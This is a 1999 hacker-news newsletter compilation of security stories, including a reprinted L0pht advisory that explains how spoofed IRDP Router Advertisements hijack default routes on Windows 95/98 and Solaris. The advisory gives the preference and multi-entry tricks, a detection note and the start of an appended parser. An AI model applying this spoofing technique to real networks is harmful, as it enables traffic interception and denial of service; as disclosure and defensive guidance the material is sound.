     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by bluesky

With $600,000 provided by two federal grants officials have set up the San Diego Regional Computer Forensics Laboratory with the support of 32 federal, state and local law enforcement agencies. The lab will be manned by 14 FBI trained specialists from local police agencies, including the San Diego Police Department and the Sheriff's Department. The lab will conduct court-approved wiretap operations that call for intercepting Internet communications as well as data recovery and analysis from seized computer systems.

San Diego Union Tribune
http://www.uniontrib.com/news/uniontrib/fri/metro/news_2m6lab.html

First regional computer crime laboratory set up in San Diego

Forensic team will retrieve electronic evidence for use in trials

By Bruce V. Bigelow
STAFF WRITER

August 6, 1999

Overwhelmed by the use of computers in illegal activities, federal authorities have formed a regional crime lab in San Diego that specializes in retrieving computerized data and preserving the evidence for trial.

The San Diego Regional Computer Forensics Laboratory is being hailed by organizers as the first of its kind, and it already has become a nationwide model for law enforcement in other cities -- even before its FBI-trained specialists have received their first case. The lab also is expected to eventually conduct court-approved wiretap operations that call for intercepting Internet communications.

"All of us involved in the investigation and prosecution of computer crime view the San Diego lab as a prototype of what we hope to establish in various jurisdictions around the country," said David Schindler, a federal prosecutor in Los Angeles who won convictions of Kevin Mitnick and other notorious hackers.
Most of the lab's 14 forensic specialists are sworn officers from local police agencies, including the San Diego Police Department and the Sheriff's Department. The lab's electronic infrastructure was designed by computer security experts at the Navy's Space and Naval Warfare Systems Command headquarters.

"This is extremely important, not just a little important," said Alan Paller, a computer security expert at the SANS Institute, an international research and education cooperative for more than 60,000 system administrators. "The vast majority of discoveries (of network intrusions) go unresolved because there are no resources outside the FBI of any scale. If the probability of getting caught and put in jail is far-removed, why worry?"

About $600,000 needed to renovate FBI offices and equip the facility was provided by two federal grants, said Mitch Dembin, an assistant U.S. attorney in San Diego who proposed the idea.

"I sold this idea to the individuals who are doing this on their own in the wilderness of their own departments, and then I sold the idea to the department heads in those agencies," Dembin said. A total of 32 federal, state and local law enforcement agencies have agreed to support the lab, he added.

"The idea is one I very much agree with," said Doug Tygar, a professor of computer science at the University of California Berkeley who specializes in computer security. "Unless they have the ability to deal with digital data, digital transactions, law enforcement agencies are going to be behind the curve."

While the FBI established a computer forensics lab at its Washington headquarters years ago, experts say the agency also has maintained tight controls over the software tools used by its forensic specialists. "Until now, the FBI only trained its own people," Dembin said.
The San Diego lab's staff members, who completed their FBI training seven weeks ago, are now working in temporary quarters until work on the new facility is completed in the next month or so.

"What they're doing right now is developing the protocols and processes that will be applied to any case," Dembin said. "We're already receiving inquiries from all over country . . . which is interesting since we haven't prosecuted a single case yet."

The interest prompted Dembin to organize a session about the San Diego lab during the High Technology Crime Investigation Association's annual meeting, to be held in San Diego's Town & Country Convention Center next month.

The regional lab will help set forensic standards for local investigators and provide guidance in the way search warrants are served, computers are seized and data is retrieved for evidence at trial, said Bill Gore, who supervises the FBI office in San Diego.

"We've been pretty lucky, I think, because so far the defense attorneys haven't really homed in on the procedures that we use," said Gore. The presentation of computerized data at trial can be as complex as DNA evidence, he added.

The lab's investigators also are expected to deal with tricky investigations, such as a handful of employees who are using a corporate computer network for illegal activities. The "courts are reluctant to let the U.S. attorney shut down a business" by seizing control of a company's entire computer system, Dembin said, "so we have to come up with tools that minimize our interference with commerce."

For Dembin and other prosecutors, however, a more practical problem stemmed from protracted delays in the analysis of computer-based evidence seized in cases that ranged from securities fraud to drug crimes.

"There's been a bottleneck in analyzing computer or electronic evidence," said Schindler, who usually works with FBI forensics experts in Los Angeles.
Said Dembin: "Putting aside the question of whether the forensics was done right, cases were getting disposed of before the seized computers were even analyzed."

Dembin's first brush with computer crime occurred in 1991, when he prosecuted a disgruntled employee who tried to sabotage General Dynamics computers in San Diego with a "logic bomb." Since then, the 45-year-old prosecutor has handled his own share of malicious hacker cases.

Over the past eight years, Dembin also saw how con artists converted their telemarketing scams into Internet schemes, and he oversaw bank fraud cases that relied on computerized financial records.

"Now more and more the only place where documentary evidence exists is on the computer," Dembin said. "People are keeping their personal records of everyday activities on their computers, and criminal society is no different."

Copyright 1999 Union-Tribune Publishing Co.

11.0 University Sys Admin Faced with 10 Years for Using Too Much Bandwidth
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by evenprime

A former University of Oklahoma systems administrator has been charged with using too much bandwidth. He faces a single count of disrupting the university's Internet service after he allegedly set up a warez site on the University owned servers. While not charged with piracy or copyright infringement the local DA decided to prosecute under the Oklahoma Computer Crimes Act of 1984 which states that it is a felony to "willfully and without authorization disrupt or cause the disruption of computer services or deny or cause the denial of access or other computer services to an authorized user of a computer, computer system or computer network." He faces up to 10 years in the state penitentiary and up to $100,000 in fines. (So now it is a crime to have a popular site? This article fails to mention if this person was a legitimate user of the network to begin with.)
ZD Net
http://www.zdnet.com/zdnn/stories/news/0,4586,2310624,00.html

--------------------------------------------------------------
This story was printed from ZDNN,
located at http://www.zdnet.com/zdnn.
--------------------------------------------------------------

Disrupting Net access a cybercrime?
By Robert Lemos, ZDNN
August 6, 1999 3:28 PM PT
URL: http://www.zdnet.com/zdnn/stories/news/0,4586,2310624,00.html

A former system administrator of the University of Oklahoma has been charged under the state's computer-crime statutes with slowing the university's network to a crawl.

Ryan Breding, 25, faces a single count of disrupting the university's Internet service in 1997, when hordes of incoming students downloaded pirated software from servers that he had allegedly set up on the university's network.

"There were times when the authorized users -- students -- were not able to access the Internet at all," said Scott Palk, first assistant attorney general for Oklahoma's Cleveland County District Attorney's Office.

Known as warez (pronounced "wares"), the software is identical to store-bought versions and includes serial numbers to spoof the copy protection mechanisms. The downloads overloaded the network, and many students were denied access.

Getting up to speed

While distributing such software is illegal, the district attorney's office has only charged Breding with interfering with network operation. On that charge alone, the former employee faces up to 10 years in the state penitentiary and up to $100,000 in fines.

The Oklahoma Computer Crimes Act of 1984 makes it a felony to "willfully and without authorization disrupt or cause the disruption of computer services or deny or cause the denial of access or other computer services to an authorized user of a computer, computer system or computer network."

An initial lack of familiarity with computer crimes stymied the investigation.
State investigators and prosecutors needed to learn how to pursue digital criminals and examine the evidence. "These are new crimes -- at least locally," said Palk. "Some people had to undergo training to look into it."

Palk stressed that, for the investigators, the case was a necessary learning experience. "This may be a hallmark of things to come," he said. "And we need to be ready."

University officials would not comment for this story. A preliminary hearing is set to start on Aug. 17.

@HWA

12.0 Chaos Computer Camp Fun For All Last Weekend
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by turtlex

A computer, some beer, cyber friends, warm grass and a new moon, what more could you ask for? Chaos Computer Club Camp wrapped up over the weekend, people are saying it was the most fun they have had since HIP.

Wired
http://www.wired.com/news/news/culture/story/21159.html

(Printed in last issue)

13.0 NIST Announces the AES Finalist Candidates
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by evilwench

Five encryption technologies have made the final cut to be the next standard cryptographic mechanism used to protect sensitive government information. It has taken over a year to whittle the initial field of twelve entries down to five, one of which will replace DES, the current standard. The final standard is expected to be chosen by the Summer of 2001. The five finalists for the advanced encryption standard (AES) were named by the National Institute of Standards and Technology on Monday. The five finalists are MARS, RC6(TM), Rijndael, Serpent, and Twofish.

Advanced Encryption Standard (AES) Development Effort
http://www.nist.gov/aes

Federal Computer Week
http://www.fcw.com:80/pubs/fcw/1999/0809/web-nist-8-9-99.html

ZD Net
http://www.zdnet.com/zdnn/stories/news/0,4586,1015886,00.html

FCW;

AUGUST 9, 1999 . . .
16:15 EDT

NIST names finalists in AES development

BY DIANE FRANK (dfrank@fcw.com)

The National Institute of Standards and Technology today named the five finalists in its development of the next-generation Advanced Encryption Standard.

NIST has been working with 15 candidates from 12 countries for the past year to test their submissions for the AES algorithm. NIST will use AES to replace the Data Encryption Standard adopted in 1977 as a federal information processing standard for federal agencies.

The five finalists are

  MARS, developed by IBM Corp., Armonk, N.Y.

  RC6, developed by RSA Laboratories, Bedford, Mass.

  Rijndael, developed by Joan Daemen and Vincent Rijmen of Belgium.

  Serpent, developed by Ross Anderson, Eli Biham and Lars Knudsen of the United Kingdom, Israel and Norway, respectively.

  Twofish, developed by Bruce Schneier, John Kelsey, Doug Whiting, David Wagner, Chris Hall and Niels Ferguson, most of whom are associated with Counterpane Systems, Minneapolis, Minn.

All of the candidate algorithms support cryptographic key sizes of 128, 192 and 256 bits and were tested by NIST and other cryptographic groups around the world. A full report on the process is available on the AES World Wide Web site at www.nist.gov/aes.

-=-

ZDNET;

Finalists for new crypto standard named
By Jim Kerstetter, PC Week
August 9, 1999 1:05 PM PT
URL: http://www4.zdnet.com/zdnn/stories/news/0,4586,1015886,00.html?chkpt=hpqs014

DES is a step closer to the dustbin.

The U.S. Commerce Department's National Institute of Standards and Technology (NIST) today announced five finalists in the two-year competition to find a replacement for the Data Encryption Standard, which has served as the government's basic encryption standard since 1977.
The replacement, to be called the Advanced Encryption Standard (AES), should be completed by the summer of 2001, according to NIST.

The five finalists include:

  MARS, developed by IBM in Armonk, NY. IBM researchers also created DES back in the '70s.

  RC6, developed by Ron Rivest (inventor of the RSA public key algorithm and several other well-known hashing and private key algorithms) and RSA Laboratories in Bedford, Mass.

  Rijndael, developed by Joan Daemen and Vincent Rijmen of Belgium.

  Serpent, developed by Ross Anderson, Eli Biham and Lars Knudsen of the United Kingdom, Israel and Norway.

  Twofish, developed by Bruce Schneier, John Kelsey, Doug Whiting, David Wagner, Chris Hall and Niels Ferguson of Counterpane Systems in Minneapolis. Schneier also developed the popular Blowfish symmetric algorithm.

Resisting brute force

DES -- as well as its replacement, AES -- is what cryptographers call a symmetric or private key algorithm. A symmetric algorithm requires that both parties receiving encryption have a copy of the same encryption key in order to read the scrambled data. It is also likely the most widely used encryption algorithm in the world today, supported by most commercial encryption products.

But DES has proven to be easy prey for modern technology. It uses keys of 56 bits, which were first broken nearly three years ago. In January 1999, cryptographers using a special DES-cracking machine, along with a nationwide network of PCs, were able to crack DES in less than 24 hours.

The crackers used a "brute force" method of attack to solve the mathematical factoring behind DES. In other words, they put a lot of processing horsepower against the algorithm and were able to solve it -- something that has been feasible only in the last couple of years because of improvements in chip technology.

AES on the scene

Enter the AES. NIST first requested proposals for the AES in September 1997. Each of the candidate algorithms supports key sizes of 128, 192 and 256 bits.
A 128-bit key cannot be broken using known technology today. Each added bit essentially doubles the key strength. RSA Data Security Inc. CEO Jim Bidzos used the following analogy at the company's conference in January:

  A 40-bit key is the water that fills a spoon.

  A 56-bit key is the water that fills a small swimming pool.

  A 128-bit key would be all of the water on the planet.

"The process has always been about standardization," said Counterpane's Schneier. "AES will be the encryption standard for the next 20 or so years, and hence will be used in applications that we can't imagine. If a single algorithm is to be chosen for AES, it must be efficient in all current and imagined applications."

NIST will make the five finalist algorithms publicly available. Analysis of the finalists will be presented at a conference in April 2000, and public comments will be accepted until May 15, 2000, according to the NIST.

@HWA

14.0 Clinton Designates Group to Look At CyberCrime
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Ryan

On Saturday August 7th, President Clinton issued an executive order to establish a working group to examine unlawful conduct on the internet. The group is to determine if current laws are adequate to combat online crime such as child pornography and sales of illegal drugs. The executive order also calls for closer examination of the tools used by law enforcement to investigate these crimes. This could be interpreted as a major call for key escrow. The group has been ordered to complete its reports within 120 days.

US Newswire- Text of Executive Order
http://www.usnewswire.com/topnews/Current_Releases/0807-107.htm

ZD Net
http://www.zdnet.com/zdnn/stories/news/0,4586,2311209,00.html

Wired
http://www.wired.com/news/news/politics/story/21191.html

Executive order;

Text of Clinton Executive Order on Internet Conduct

U.S.
Newswire 7 Aug 11:07

Text of Clinton Executive Order Establishing Working Group to Examine Unlawful Conduct on the Internet

To: National Desk
Contact: White House Press Office, 202-456-2100

WASHINGTON, Aug. 7 /U.S. Newswire/ -- The following is the text of an Executive Order released today by President Clinton:

EXECUTIVE ORDER
- - - - - - -
WORKING GROUP ON UNLAWFUL CONDUCT ON THE INTERNET

By the authority vested in me as President by the Constitution and the laws of the United States of America, and in order to address unlawful conduct that involves the use of the Internet, it is hereby ordered as follows:

Section 1. Establishment and Purpose.

(a) There is hereby established a working group to address unlawful conduct that involves the use of the Internet ("Working Group"). The purpose of the Working Group shall be to prepare a report and recommendations concerning:

  (1) The extent to which existing Federal laws provide a sufficient basis for effective investigation and prosecution of unlawful conduct that involves the use of the Internet, such as the illegal sale of guns, explosives, controlled substances, and prescription drugs, as well as fraud and child pornography.

  (2) The extent to which new technology tools, capabilities, or legal authorities may be required for effective investigation and prosecution of unlawful conduct that involves the use of the Internet; and

  (3) The potential for new or existing tools and capabilities to educate and empower parents, teachers, and others to prevent or to minimize the risks from unlawful conduct that involves the use of the Internet.

(b) The Working Group shall undertake this review in the context of current Administration Internet policy, which includes support for industry self-regulation where possible, technology-neutral laws and regulations, and an appreciation of the Internet as an important medium both domestically and internationally for commerce and free speech.

Sec. 2. Schedule.
The Working Group shall complete its work to the greatest extent possible and present its report and recommendations to the President and Vice President within 120 days of the date of this order. Prior to such presentation, the report and recommendations shall be circulated through the Office of Management and Budget for review and comment by all appropriate Federal agencies.

Sec. 3. Membership.

(a) The Working Group shall be composed of the following members:

  (1) The Attorney General (who shall serve as Chair of the Working Group).
  (2) The Director of the Office of Management and Budget.
  (3) The Secretary of the Treasury.
  (4) The Secretary of Commerce.
  (5) The Secretary of Education.
  (6) The Director of the Federal Bureau of Investigation.
  (7) The Director of the Bureau of Alcohol, Tobacco and Firearms.
  (8) The Administrator of the Drug Enforcement Administration.
  (9) The Chair of the Federal Trade Commission.
  (10) The Commissioner of the Food and Drug Administration; and
  (11) Other Federal officials deemed appropriate by the Chair of the Working Group.

(b) The co-chairs of the Interagency Working Group on Electronic Commerce shall serve as liaison to and attend meetings of the Working Group. Members of the Working Group may serve on the Working Group through designees.

WILLIAM J. CLINTON

THE WHITE HOUSE, August 5, 1999.

-0-

/U.S. Newswire 202-347-2770/

08/07 11:07

Copyright 1999, U.S. Newswire

-=-

ZDNET;

Clinton establishes Net crime taskforce
By Maria Seminerio, ZDNN
August 9, 1999 12:50 PM PT
URL:

UPDATED 3:30 PM PT

President Clinton on Saturday established a working group to address cybercrimes, including online sales of illegal drugs and explosives, and online child pornography trafficking.
The working group is charged with determining whether existing federal laws are sufficient to combat Internet-related crime.

Also, in what seems like a call for widespread key escrow for encrypted communications, Clinton ordered the task force to determine "the extent to which new technology tools, capabilities or legal authorities may be required for effective investigation and prosecution of unlawful conduct" online.

The issue of key escrow -- allowing law enforcement a guaranteed "back door" into encrypted online messages -- is hugely controversial, and has been a central bone of contention in the debate over the Clinton administration's encryption export policies. The director of the Federal Bureau of Investigation, Louis Freeh, is a vocal supporter of key escrow, but online privacy advocates believe any such plan would be disastrous for individual Internet users.

"It's a valid concern," said David Sobel, general counsel at the Electronic Privacy Information Center, when asked whether the move is a precursor to a more aggressive key escrow push.

Why no wider investigation?

With the controversy over illegal Internet porn and online drug and gun sales having sizzled for some time, Sobel said it's unclear why the White House should now launch a wider investigation.

It's also unclear what action, if any, Clinton will take after the group completes its report, a White House spokesman told ZDNN Monday. Clinton could urge Congress to pass new Net crime laws, although there is no specific plan for him to do so, the spokesman said.

Another administration official, speaking on condition of anonymity, said the task force's work won't be specifically aimed at the key escrow issue. "We just wanted to take a step back and see what new laws, if any, are needed" to address cybercrimes, the official told ZDNN.
The task force will include Freeh, Attorney General Janet Reno, and other federal officials, such as the director of the Office of Management and Budget, the Secretary of the Treasury, the Commerce Secretary and the director of the Bureau of Alcohol, Tobacco and Firearms. The co-chairs of the Advisory Commission on E-Commerce will serve as liaisons.

Clinton ordered the group to complete a report within 120 days, and many federal agencies will have a chance to respond before it is made public.

-=-

Wired;

Plan B for Cyber Space
Wired News Report

5:00 p.m. 9.Aug.99.PDT

President Clinton has asked his advisers to come up with new ways to combat illegal online activity including child porn and the sale of guns, drugs, and explosives.

In announcing a new working group on unlawful conduct on the Internet, the Administration stopped short of calling for new laws. Instead, Vice President Gore said the feds may need new technology tools, capabilities, or legal authorities to fight cybercrime.

"What we need to do is find new answers to old crimes," said Gore in a statement released Friday.

About 11 federal agencies will participate in the working group, including the Bureau of Alcohol, Tobacco, and Firearms; the FBI; the Commerce Department; the Food and Drug Administration; and the Drug Enforcement Agency. Each agency will solicit ideas for deterring cybercrime from the private sector and from state and local law enforcement officials.

"The working group will help to make the Internet a safe place for all Americans by examining the extent to which existing federal law and technological tools are effective in combating crime on the Internet," Gore said.

The working group will make its recommendations in four months in the context of current policies and principles. Among those principles: that industry should self-regulate, that laws should be technology-neutral, and that the Internet is an important medium for commerce and free speech.
The administration announced the new strategy only weeks after lawmakers and privacy activists panned a Clinton-approved plan to develop a nationwide surveillance network. That proposed network, recommended by the White House National Security Council and known as the Federal Intrusion Detection Network (Fidnet), sought to fight cybercrime by vacuuming up electronic signals. Prominent House republicans slammed that plan. House Majority Leader Dick Armey warned that the Fidnet could grow into an "Orwellian" system.

@HWA

15.0 Taiwan Government Web Sites Defaced
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Weld Pond

Several Taiwanese government web sites have been defaced by someone claiming to be from the Hunan province in China. The defacements contained political statements, in Chinese and English, concerning Taiwan's political status. An unidentified official said that he did not think that firewalls were necessary on public web servers.

Excite News
http://news.excite.com/news/r/990809/02/net-taiwan-hacker

Pro-China Hacker Attacks Taiwan Govt. Web sites

Updated 2:58 AM ET August 9, 1999

TAIPEI, Taiwan (Reuters) - A person claiming to be from mainland China hacked into several Taiwan government Internet sites to insert pro-China messages amid a heated row between the two sides over Taiwan's political status. "Only one China exists and only one China is needed," read a message inserted Sunday into the Web site of the Control Yuan -- Taiwan's highest watchdog agency. In apparent references to President Lee Teng-hui's controversial call for "special state-to-state" ties between Taiwan and China, the message said Taiwan was and would always be an inseparable part of China. "The Taiwanese government headed by Lee Teng-hui can not deny it." The same messages -- in Chinese and English -- were placed in several other government Web sites, a Control Yuan official said Monday.
"It looks like it was the same person who claimed to come from Hunan province," the official, who declined to be identified, said by telephone. The official said public Web sites were relatively easy to hack into. "It is a public Web site containing open information, so we didn't think firewalls were necessary," the official said. "Now we know it's a problem and we will fix it in the next few days." Firewalls are electronic security screens. Lee's redefinition of cross-strait ties has infuriated Beijing, which views the island as a wayward province and vows to bring it under mainland rule, by force if necessary. @HWA 16.0 DoD Ordered to Change All Passwords ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Sarge The Defense Department has ordered all administrative and user passwords on their unclassified networks to be changed. The official reason is to protect against possible Y2K cyber attacks. Rumours indicate that this order may be the result of recent computer security breaches. Federal Computer Week http://www.fcw.com:80/pubs/fcw/1999/0809/fcw-newsdod-08-09-99.html AUGUST 9, 1999 DOD: Change Passwords BY DANIEL VERTON (dan_verton@fcw.com) Concerned that efforts to fix computer systems for the Year 2000 problem may expose its information infrastructure to cyberattacks, the Defense Department has ordered its network managers to change all administrative and user passwords on their unclassified networks. The order is the result of mandatory guidance issued last month to all of the military services' network security organizations by the Joint Task Force for Computer Network Defense. While a JTF-CND spokesperson could not confirm or deny rumors that the guidance may be the result of a recent breach of computer security, the spokesperson said that the FBI's National Infrastructure Protection Center is currently investigating intrusions into unclassified DOD networks. 
"We're trying to start a better process for password protection," the spokesperson said. "We gave [our components and other DOD organizations] several weeks to do this [because] we know it can't be done overnight." The JTF-CND, which was formed last December, serves as the focal point for DOD to organize the defense of DOD computer networks and systems. When cyberattacks are detected, the JTF-CND is responsible for directing departmentwide defenses to stop or contain damage and restore DOD network functions operations. The mandatory actions called for by the JTF-CND directive include changing all administrative and user passwords for all unclassified systems and then restarting the operating systems for systems that are connected to the network. The process is known as a "warm boot" and is not a full shutdown of the system, the spokesperson said. Major commands affected by the guidance and responsible for managing compliance in their respective services include the Air Force Information Warfare Center, the Army's Land Information Warfare Activity, the Defense Information Systems Agency, the Marine Corps' Marine Forces-CND and the Navy Component Task Force-CND. As a result of the directive, the NCTF-CND issued classified and unclassified messages ordering password changes. However, a spokesman for the Space and Naval Warfare Systems Command, one of the primary recipients of the message, declined to comment because of the sensitivity of the message's content. In an administrative message issued last week by the NCTF-CND, the Navy offered technical guidance to system administrators on how to deal with the lack of password date-change tracking functionality in Microsoft Corp.'s Windows NT. As a result, the Navy has made three software tools available over the Internet to help administrators automate the enforcement of password changes. 
In May, Art Money, senior civilian official acting as the assistant secretary of Defense for command, control, communications and intelligence, issued a DOD-wide memorandum about the potential threat to DOD networks posed by the Year 2000 computer problem. In that memo, Money cited DOD Administrative Instruction 26, which provides specific guidance on the use of passwords. A DOD spokesperson said there is "no inherent connection between the May 5 Money memo and the July 23 [JTF-CND] message -- other than they are related in the context of the department constantly putting out guidance that requires vigilance over our networks."

@HWA

17.0 Belgians Under Cyber Attack From One Man
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by superman

ReDatAck, a Belgian man, has claimed to have broken into the database of Skynet, owned by Belgian state-run telecommunications operator Belgacom, and accessed private information on over 1,000 users. The information allegedly includes credit card numbers and passwords. ReDatAck has also claimed to have broken into the free address book server of Lycos. ReDatAck has said that he is trying to alert people to the security weaknesses of the internet.

Yahoo News
http://dailynews.yahoo.com/h/nm/19990809/wr/belgium_hacker_1.html

Monday August 9 12:38 PM ET

Belgian Hacker Warns Of Internet Security Risk

BRUSSELS (Reuters) - A computer hacker who broke into Belgium's leading Internet access provider vowed Monday to carry on attacking Web sites and databases in a bid to alert Belgium to the security risks of the Internet.

``ReDatAck'', a man in his twenties, told Reuters by telephone he had broken into the database of Skynet, owned by Belgian state-run telecommunications operator Belgacom, Friday night and obtained secret information on over 1,000 users.
``I have...their Visa (credit card) numbers and expiration dates, their login and passwords, access to their Web sites,'' ``ReDatAck'' said, stressing he wanted to ``wake up Belgium'' to the Internet's security risks rather than misuse the information. ``Nobody thinks about security,'' he said.

Skynet director Philippe Lemmens said Monday he planned to file a complaint against ``ReDatAck'' and assured users that security had been stepped up against future hackers.

But ``ReDatAck'', who claimed he had also broken into the free address book server of U.S. Internet portal Lycos, was undeterred.

``I'll go on hacking. They can try to find me. It doesn't scare me. If they do find me, it will make more publicity,'' he said, adding that he was currently working on breaking into a hospital database. He declined to say which hospital.

@HWA

18.0 IRDP Hole in Win and Sol Leaves Users Open to Attack
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Silicosis

By spoofing IRDP Router Advertisements, an attacker can remotely add default route entries on a remote system, including most Windows machines and some Solaris systems. The attacker's default route entry will be preferred over the DHCP server's default route. DHCP addressing is used by many corporations, cable modem systems, and dialup ISPs. This attack significantly increases a user's risk of passive snooping, man-in-the-middle attacks, and denial of service attacks.

L0pht Heavy Industries - Full advisory with sample code and patches
http://www.l0pht.com

L0pht Security Advisory

Release date: August 11, 1999

Vulnerable: Microsoft Windows95a (w/winsock2), Windows95b, Windows98, Windows98se and Sun Microsystems SunOS & Solaris operating systems.

Severity: Attackers can remotely add default route entries on the victim's host.

Status: Microsoft contacted, fix provided.
Author: sili@l0pht.com
URL: http://www.L0pht.com/advisories.html
Source code: http://www.l0pht.com/advisories/rdp.tar.gz
code written by Silicosis & Mudge

I. Problem
----------

The ICMP Router Discovery Protocol (IRDP) comes enabled by default on DHCP clients that are running Microsoft Windows95 (w/winsock2), Windows95b, Windows98, Windows98se, and Windows2000 machines. By spoofing IRDP Router Advertisements, an attacker can remotely add default route entries on a remote system. The default route entry added by the attacker will be preferred over the default route obtained from the DHCP server. While Windows2000 does indeed have IRDP enabled by default, it is less vulnerable as it is impossible to give it a route that is preferred over the default route obtained via DHCP.

SunOS systems will also intentionally use IRDP under specific conditions. For Solaris2.6, the IRDP daemon, in.rdisc, will be started if the following conditions are met:

. The system is a host, not a router.
. The system did not learn a default gateway from a DHCP server.
. The system does not have any static routes.
. The system does not have a valid /etc/defaultrouter file.

It should be noted that the important point of this advisory is not that ICMP Router Solicitation and Advertisement packets have no authentication properties. Yes, this is a problem but it has long been known. The dangerous aspect comes in various MS platforms enabling this protocol and believing it _even when the DHCP setup specifies router information_ (ie the operating system does this even though you believe you are telling it NOT TO).

The tool provided with this advisory is the basis of what would be used for everything from web page hacks, stealing credentials, modifying or altering data, etc. involving vulnerable systems. We believe most cable modem DHCP clients and large internal organizations are at risk.

II. Risks
---------

The ICMP Router Discovery Protocol does not have any form of authentication, making it impossible for end hosts to tell whether or not the information they receive is valid. Because of this, attackers can perform a number of attacks:

Passive monitoring:
In a switched environment, an attacker can use this to re-route the outbound traffic of vulnerable systems through them. This will allow them to monitor or record one side of the conversation.
* For this to work, an attacker must be on the same network as the victim.

Man in the Middle:
Taking the above attack to the next level, the attacker would also be able to modify any of the outgoing traffic or play man in the middle. By sitting in the middle, the attacker can act as a proxy between the victim and the end host. The victim, while thinking they are connected directly to the end host, is actually connected to the attacker, and the attacker is connected to the end host and is feeding the information through. If the connection is to a secure webserver that uses SSL, by sitting in the middle, the attacker would be able to intercept the traffic, unencrypted. A good example of this risk is on-line banking; an attacker playing man-in-the-middle would be able to intercept all of the banking information that is relayed, without the victim's knowledge.
* For this to work, an attacker must be on the same network as the victim.

Denial of Service:
Remote attackers can spoof these ICMP packets and remotely add bad default-route entries into a victim's routing table. Because the victim's system would be forwarding the frames to the wrong address, it will be unable to reach other networks. Unfortunately, DHCP has quickly become popular and is relied upon in most companies. In some cases, such as cable & *DSL modems, users are required to use DHCP.
Because of the large number of vulnerable systems, and the fact that this attack will penetrate firewalls that do not stop incoming ICMP packets, this Denial of Service attack can become quite severe.

It should be noted that the above attacks are documented in Section 7 of RFC 1256. However, the RFC states that the attacks are launched by an attacker on the same network as the victim. In the Denial of Service attack, this is not the case; an attacker can spoof IRDP packets and corrupt the routing tables on systems that are on remote networks.

While these attacks are not new, the fact that Windows95/98 DHCP clients have been vulnerable for years, is. On systems running SunOS & Solaris, it is easy to find documentation on IRDP by looking at the startup scripts or manpages. On Windows95/98, however, information has only recently become available in the Knowledge Base.

III. Technical Details
----------------------

Upon startup, a system running MS Windows95/98 will always send 3 ICMP Router Solicitation packets to the 224.0.0.2 multicast address. If the machine is NOT configured as a DHCP client, it ignores any Router Advertisements sent back to the host. However, if the Windows machine is configured as a DHCP client, any Router Advertisements sent to the machine will be accepted and processed.

Once an Advertisement is received, Windows checks to see how many Gateway entries the packet contains. If the packet contains only 1 entry, it checks to make sure the IP source address of the Advertisement is inside the host's subnet. If it is, the Router Address entry inside the advertisement is checked to see that it is also within the host's subnet. If so, a new default route entry is added. If the address is outside the subnet, the advertisement is silently ignored.

If a host receives a Router Advertisement that contains 2 or more Router Addresses, the host will process the packet even though the IP source address is not local.
If the host finds a Router Address inside the advertisement that is inside the host's subnet, it will add a default route entry for it. Because the host does not care about the IP source address of the Advertisement as long as it has more than one entry, attackers can now create bogus IRDP packets that will bypass anti-spoofing filters.

Before the host can add a new default route entry, it has to determine the route metric. On Windows95/98, normal default route entries obtained from a DHCP server have a metric of 1. In order to determine the metric for the default route entry obtained via IRDP, the Windows host subtracts the Advertisement's Preference value from 1000. By creating an ICMP Router Advertisement with a preference of 1000, the default gateway route added will have a metric of 0, making it the preferred default route. By adjusting the Lifetime value in the advertisement, an attacker can adjust how many seconds the gateways are valid for.

IV. Fixes / Work-arounds
------------------------

Firewall / Routers:
Block all ICMP Type 9 & Type 10 packets. This should protect against remote Denial of Service attacks.

Windows95/98:
The Microsoft Knowledge Base contains an article that gives info on how to disable IRDP. It can be found at:
http://support.microsoft.com/support/kb/articles/q216/1/41.asp

Brief Summary of article:
IRDP can be disabled manually by adding the "PerformRouterDiscovery" value name and setting it to a dword value of 0, under the following registry key(s):
HKLM\System\CurrentControlSet\Services\Class\NetTrans\####
Where #### is the binding for TCP/IP. More than one TCP/IP binding may exist.

Solaris:
Configure your host to obtain a default gateway through DHCP, static routes, or via the /etc/defaultrouter file. For more information on IRDP refer to in.rdisc's man-page.

V. Detection
------------

L0pht has released an NFR Intrusion Detection Module to detect both Router Solicitations and Advertisements.
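Added example, not from the L0pht advisory or its rdp tool: a Python parser for ICMP Router Advertisements (RFC 1256, type 9) that models the Windows 95/98 acceptance rules from section III and flags advertisements which would be installed with a metric at or below the DHCP default route's metric of 1, or which carry the multi-entry, off-subnet-source pattern that bypasses anti-spoofing filters. The subnet, addresses and packets are constructed test data.

```python
"""Parse ICMP Router Advertisements (RFC 1256, ICMP type 9), model the
Windows 95/98 acceptance rules described in the advisory, and flag
advertisements that would displace the DHCP-learned default route."""
import ipaddress
import struct
from dataclasses import dataclass
from typing import List, Tuple

ICMP_ROUTER_ADVERTISEMENT = 9   # IRDP advertisement (one of the two types to block at the border)
ICMP_ROUTER_SOLICITATION = 10   # IRDP solicitation (the other)
DHCP_DEFAULT_ROUTE_METRIC = 1   # metric of a DHCP-learned default route on Win95/98 (advisory, sec. III)
IRDP_METRIC_BASE = 1000         # Win95/98 computes metric = 1000 - advertised preference


def internet_checksum(data: bytes) -> int:
    """Standard one's-complement Internet checksum (RFC 1071)."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return ~total & 0xFFFF


@dataclass
class RouterAdvertisement:
    lifetime: int                                     # seconds the entries stay valid
    entries: List[Tuple[ipaddress.IPv4Address, int]]  # (router address, preference level)


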